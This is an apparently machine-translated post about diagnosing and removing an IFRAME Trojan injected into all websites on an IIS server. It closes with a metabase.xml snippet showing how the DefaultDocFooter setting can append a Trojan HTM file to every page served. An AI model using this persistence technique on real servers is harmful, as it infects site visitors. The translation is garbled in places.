How to solve the problem that the server is infected with an IFRAME Trojan (not IIS ing modification or ARP virus, and the IFRAME code in the source code of the webpage file does not exist)

Today, I visited a company website and suddenly found that the webpage was incorrect. Right-click to view HTMLCodeIFRAME is a website JS file. Needless to say, it must have been infected.

Go to the server and read the file.Source codeThe IFRAME Code does not exist, but the IFRAME code is automatically added to all websites on the server.

My first response was that the IIS ing was modified. I checked it.

Nothing was modified in it.

Suddenly I think of this problem on the school website when I was in college. It was caused by the crazy ARP virus, that is, it was not a virus on the machine, but a mixed model machine on the network. So I suggest installing an arpfirewall. I searched on the Internet and said it may also be caused by web service extensions in IIS. So I looked at it again and found that there was no problem.

Finally, I suddenly found that there was an exception. Here, I solved this problem temporarily (the DLL or EXE file may be virus in the system, and the system should be antivirus, I don't care about the server, so I have to worry about it .)

For example:

Start the Document Footer. An HTM file is attached here. I open c: \ windows \ system32 \ com \ iis.htm with a text document and find that this IFRAME code is in it, this HTM is not normal, so I removed the document footer and deleted the HTM file. The problem was solved temporarily (because the system may have viruses, so solve it for the time being)

Many people on the Internet say that their servers are attacked by ARP viruses, IIS tails, and so on. If they do not solve the problem, please take a look at this document and hope to help you.

I used to play the game for a while, but I haven't touched it for a long time. According to this JS file, I found many HTM files on virus websites. I downloaded them, if you are free, analyze the analysis. If you are not busy, scan the server to scan the server and help the server find a backdoor :)

 

------------------------------

After reading this, the original Trojan only needs to insert a piece of code in C: \ windows \ system32 \ inetsrv \ metabase. XML (C is the system disk), for example:

<Iiswebvirtualdir location = "/lm/w3svc/81120797/root"
Accessflags = "accessread | accessscript"
Appfriendlyname = "Default ApplicationProgram"
Appisolated = "2"
Approot = "/lm/w3svc/81120797/root"
Authflags = "authanonymous | authntlm"
Defaultdocfooter = "file: c: \ windows \ system32 \ com \ aa.htm"

As shown above, just insert the HTM file with a Trojan in defaultdocfooter = "file: c: \ windows \ system32 \ com \ aa.htm". It's no difficulty, but after knowing the principle, do not destroy yourself. :)